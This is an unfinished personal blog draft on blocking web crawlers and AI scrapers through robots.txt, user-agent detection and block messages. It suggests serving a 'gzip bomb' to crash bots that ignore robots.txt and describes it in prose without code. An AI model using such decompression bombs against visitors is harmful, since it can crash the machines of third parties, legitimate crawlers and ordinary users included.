NOTE: This is still work in progress {class=“notification is-info is-light”}
After years of allowing it, I now want to block the majority of crawler bots. Since 50% of traffic on websites is from bots this creates a few problems I wouldn’t have had a problem problem but since [AI]
Using Robots.txt to block them
Robots.txt is a file which is followed by some bots to disallow
How to detect bots and cralwers?
There are plenty of such bots, hard to detect. since they can spoof their useragent. Some don’t spoof it (using the default one) which youcan easily detect and block An easy thing to do is using the gzip bomb
Providing a message
Maybe don’t block curl/wget requests as someone might really be trying to read your webstie through curl? But the problem is that curl/wget can be used to automate… so
Instead provide a message that that page is blocked and .. well you invite them to visit a real browser.
IF you do block, makes sure you choose some alternative means of people finding you on the internet or allow a few bot crawlers like google to index your website
Gzip Bomb THem
If bots won’t follow robots.txt, well bad for them since you have a surprise for them
You can create a 10GB or even a 1TB (terabyte) file which contains just zeroes and gzip it a few times to only be between 5 ~ 50KB When the browser/crawler accesses that page (gzipped), especially if they are using headless browsers will use huge amounts of resources (RAM,CPU) to decipher the 10GB/1TB file (which is tiny when gzipped), Effectively making them run out of memory and crash. This will teach them to not mess with your website if they can’t follow basic instructions.
WHY GZIP? It’s wel supported by most browsers.
Various resources
https://www.theverge.com/24315071/ai-training-chatgpt-gemini-copilot-how-to
https://github.com/dmitrizzle/disallow-ai/blob/main/src/robots.txt